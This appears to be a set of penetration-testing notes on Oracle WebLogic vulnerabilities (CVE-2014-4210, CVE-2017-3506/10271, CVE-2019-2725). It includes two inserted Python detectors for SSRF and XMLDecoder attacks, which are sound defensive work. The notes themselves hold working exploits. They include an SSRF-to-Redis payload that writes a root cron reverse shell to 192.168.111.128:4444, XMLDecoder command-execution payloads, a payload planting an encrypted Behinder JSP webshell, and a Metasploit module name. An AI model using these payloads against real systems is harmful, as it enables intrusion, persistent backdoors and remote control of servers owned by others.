1. SSRF vulnerability (CVE-2014-4210)
- Affected versions: WebLogic 10.0.2 -- 10.3.6.0
- Vulnerable location:
127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp
- Exploitation:
Enter anything here, click Search and capture the request;
the position marked by the red box is vulnerable to SSRF.
For example, the response when it is changed to 127.0.0.1:7001:
The response when it is changed to a non-existent port such as 8888:
- Exploitation 2:
Combine %0a%0d to inject newlines with a Redis reverse shell
xxx
set asd "\n\n* * * * * sh -i >& /dev/tcp/192.168.111.128/4444 0>&1\n\n "
config set dir /var/spool/cron
config set dbfilename root
save
xxx
URL-encode the commands above
poc:
http://192.168.111.131:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/xxx%0D%0Aset%20asd%20%22%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.111.128%2F4444%200%3E%261%5Cn%5Cn%20%22%0D%0Aconfig%20set%20dir%20%2Fvar%2Fspool%2Fcron%0D%0Aconfig%20set%20dbfilename%20root%0D%0Asave%0D%0Axxx
Check on the Redis server:
No problem, the cron job was written.
After a while the shell came back as well.
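From the defender's side, the SSRF above leaves a clear trace in the web server's access log: a GET to SearchPublicRegistries.jsp whose `operator` parameter names an internal address, a non-HTTP port, or carries encoded CR/LF. The following detection helper is an added example and is not code from the original notes; the log lines it scans are constructed, and the client IP, timestamps and registry hostname in them are made up.

```python
"""
Detection helper for the uddiexplorer SSRF (CVE-2014-4210). Added example,
not code from the original notes. It scans web-server access-log lines for
requests to SearchPublicRegistries.jsp whose `operator` parameter points at
an internal address or an unusual port, or carries CR/LF (the injection
primitive the notes use to reach Redis).
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

VULN_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"
# Only the request line and status are needed from each log line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample access-log lines (Combined Log Format); the client IP,
# timestamps and registry hostname are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=x&operator=http://uddi.example.com/inquiry&btnSubmit=Search HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:02 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=x&operator=http://127.0.0.1:7001/&btnSubmit=Search HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:03 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=x&operator=http://172.20.0.2:6379/xxx%0D%0Ainfo%0D%0Axxx&btnSubmit=Search HTTP/1.1" 500 88
10.0.0.5 - - [01/Jan/2020:10:00:04 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 2048
"""


def classify_operator(value):
    """Return the reasons an `operator` URL looks like SSRF abuse ([] if clean)."""
    reasons = []
    # Raw CR/LF survives parse_qs unquoting; check it before urlsplit, which
    # silently strips those characters in current Python versions.
    if "\r" in value or "\n" in value:
        reasons.append("crlf-injection")
    parts = urlsplit(value)
    host = parts.hostname or ""
    try:
        ip = ipaddress.ip_address(host)
        internal = ip.is_private or ip.is_loopback or ip.is_link_local
    except ValueError:  # not an IP literal
        internal = host == "localhost" or host.endswith(".localhost")
    if internal:
        reasons.append("internal-address")
    try:
        port = parts.port
    except ValueError:  # out-of-range or non-numeric port
        port = -1
    # A public UDDI registry is expected on 80/443; anything else is odd.
    if port not in (None, 80, 443):
        reasons.append("unusual-port")
    return reasons


def scan_log(text):
    """Return one finding per log line that abuses the operator parameter."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if target.path != VULN_PATH:
            continue
        for value in parse_qs(target.query).get("operator", []):
            reasons = classify_operator(value)
            if reasons:
                findings.append({"line": lineno, "status": int(m.group("status")),
                                 "operator": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} status {f['status']}: {', '.join(f['reasons'])} -> {f['operator']!r}")
```

On the constructed log the first request (a public registry on a default port) is clean, the loopback probe and the CRLF-laden request to port 6379 are both flagged. A 500 on such a request is not evidence that it failed: the notes above show the command still reaches the backend service. Detection complements, not replaces, removing or access-restricting the uddiexplorer application on hosts where it is not needed.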
2. Command execution without output (CVE-2017-3506 & CVE-2017-10271)
- Affected versions: WebLogic 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0
- Vulnerable location:
127.0.0.1:7001/wls-wsat/CoordinatorPortType
(POST)
- Exploitation:
Capture the request, change the method to POST and set Content-Type to text/xml
POST body:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>cmd.exe</string></void>
<void index="1"><string>/c</string></void>
<void index="2"><string>calc</string></void>
<!--
<void index="0"><string>/bin/sh</string></void>
<void index="1"><string>-c</string></void>
<void index="2"><string>touch /tmp/shell</string></void>
-->
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
The response is a 500, but the command actually executes.
- Exploitation (writing a webshell):
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/shell.jsp</string>
<void method="println"><string>
<![CDATA[
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="xxxxxxxxxxxxxxxx";/*the key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
]]>
</string>
</void>
<void method="close"/>
</object></java></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
Then connect to http://192.168.111.131:7001/bea_wls_internal/shell.jsp with Behinder (冰蝎)
and test.
3. Deserialization remote code execution (CVE-2019-2725)
- Affected versions: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3
- Vulnerable location:
127.0.0.1:7001/_async/AsyncResponseService
(POST)
- Exploitation (much the same as the previous vulnerability):
poc
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"> <string>cmd.exe</string></void>
<void index="1"> <string>/c</string></void>
<void index="2"> <string>calc</string></void>
<!--
<void index="0"><string>/bin/sh</string></void>
<void index="1"><string>-c</string></void>
<void index="2"><string>touch /tmp/shell</string></void>
-->
</array>
<void method="start"/>
</void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>
The response is a 202.
Or get a shell directly with msf:
exploit(multi/misc/weblogic_deserialize_asyncresponseservice)
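Both chains in sections 2 and 3 share one shape: a SOAP request whose WorkContext header smuggles an XMLDecoder-style object graph (ProcessBuilder, PrintWriter and the like) to /wls-wsat or /_async. That shape is what a WAF rule or request-inspection hook should key on, rather than the specific command string. The helper below is an added example and is not code from the original notes; the three request bodies it checks are constructed (they mirror the payload shape above, with a harmless command), and the class deny list is an assumption to be extended for a given environment.

```python
"""
Request-inspection helper for the XMLDecoder-based WebLogic chains in
sections 2 and 3 (CVE-2017-3506 / CVE-2017-10271 on /wls-wsat, CVE-2019-2725
on /_async). Added example, not code from the original notes. Given a
request path, Content-Type and body, it returns the reasons the request
should be blocked or alerted on; an empty list means nothing suspicious.
"""
import xml.etree.ElementTree as ET

WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"
# Endpoint prefixes from the notes above; both accept SOAP over POST.
TARGET_PREFIXES = ("/wls-wsat/", "/_async/")
# Classes that have no business inside a WorkContext header. A starting
# point, not an exhaustive list (assumption: extend for your environment).
DANGEROUS_CLASSES = {
    "java.beans.XMLDecoder", "java.lang.ProcessBuilder", "java.lang.Runtime",
    "java.io.PrintWriter", "java.io.FileOutputStream", "java.io.FileWriter",
}

# Constructed sample bodies. BENIGN_BODY is an ordinary SOAP call; the other
# two mirror the shape of the payloads above with a harmless command.
BENIGN_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body><ping xmlns="urn:example">hello</ping></soapenv:Body>
</soapenv:Envelope>"""

WSAT_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1"><void index="0"><string>id</string></void></array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>"""

ASYNC_BODY = """<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1"><void index="0"><string>id</string></void></array>
<void method="start"/>
</void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body>
</soapenv:Envelope>"""


def inspect_request(path, content_type, body):
    """Return the list of reasons this request looks like a WorkContext attack."""
    if "xml" not in content_type.lower():
        return []  # these chains need an XML body; nothing to inspect
    if isinstance(body, str):
        body = body.encode("utf-8")
    reasons = []

    def add(reason):
        if reason not in reasons:
            reasons.append(reason)

    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        add("unparseable-xml")  # fail closed: WebLogic's own parser is lenient
    else:
        # Walk every element nested under any WorkContext header.
        for wc in root.iter("{%s}WorkContext" % WORKAREA_NS):
            for el in wc.iter():
                if el is wc:
                    continue
                if el.tag == "java":  # XMLDecoder document root (section 2 shape)
                    add("xmldecoder-java-element")
                cls = el.get("class")
                if cls in DANGEROUS_CLASSES:
                    add("dangerous-class:" + cls)
                if el.tag == "void" and el.get("method") in ("start", "exec"):
                    add("method-invocation:" + el.get("method"))
    # Name the endpoint only when the body itself gave a reason, so ordinary
    # traffic to these services is not flagged on its own.
    if reasons and path.startswith(TARGET_PREFIXES):
        reasons.insert(0, "known-vulnerable-endpoint")
    return reasons


if __name__ == "__main__":
    for name, path, body in (("benign", "/wls-wsat/CoordinatorPortType", BENIGN_BODY),
                             ("wls-wsat", "/wls-wsat/CoordinatorPortType", WSAT_BODY),
                             ("_async", "/_async/AsyncResponseService", ASYNC_BODY)):
        print(name, inspect_request(path, "text/xml", body) or "clean")
```

The section 3 body is caught even though it has no `<java>` wrapper, because the check looks at `class` and `method` attributes anywhere under WorkContext rather than at one fixed layout. Unparseable XML sent to these endpoints is reported too, since a lenient server-side parser may still act on it. Inspection of this kind is a compensating control; the fix is Oracle's patch for the listed versions, and the commonly recommended workaround where these services are unused is to remove or access-restrict the wls-wsat and async-response web applications.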
4. Arbitrary file upload (CVE-2019-2618)
- Affected versions: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3
- Vulnerable location:
127.0.0.1:7001/bea_wls_deployment_internal/DeploymentService
(POST)
- Precondition: the username and password must be known (not very useful)
- Exploitation:
(to be added)